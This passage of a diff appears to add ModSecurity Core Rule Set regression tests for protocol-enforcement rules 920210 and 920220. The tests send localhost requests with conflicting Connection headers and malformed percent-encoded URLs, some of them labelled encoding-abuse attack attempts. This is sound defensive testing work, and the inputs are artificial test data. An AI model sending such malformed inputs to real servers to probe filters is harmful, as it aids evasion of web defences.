Connection: keep-alive, keep-alive
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /
version: HTTP/1.1
output:
log_contains: id "920210"
-
test_title: 920210-7
desc: Multiple/Conflicting Connection Header Data Found (920210) from old modsec
regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Language: en-us,en;q=0.5
Connection: close, close
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /
version: HTTP/1.1
output:
log_contains: id "920210"

82
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920220.yaml Normal file
View File

@@ -0,0 +1,82 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920220.yaml"
description: "Tests to trigger rule 920220"
tests:
-
# This gets a percent but not a number after, invalid
test_title: 920220-1
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?x=%w20"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920220\""
-
# We have a valid percent encoding here
test_title: 920220-2
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?x=xyz%20%99"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920220\""
-
# url encoding includes spaces as plusses, this is valid
test_title: 920220-3
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=This+is+a+test"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920220\""
-
# testURL Encoding Abuse Attack Attempt from old modsec regressions
test_title: 920220-4
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?parm=%7%6F%6D%65%74%65%78%74%5F%31%32%33%"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920220\""
-
# testURL Encoding Abuse Attack Attempt from old modsec regressions
test_title: 920220-5
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?parm=%1G"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920220\""

Some files were not shown because too many files have changed in this diff Show More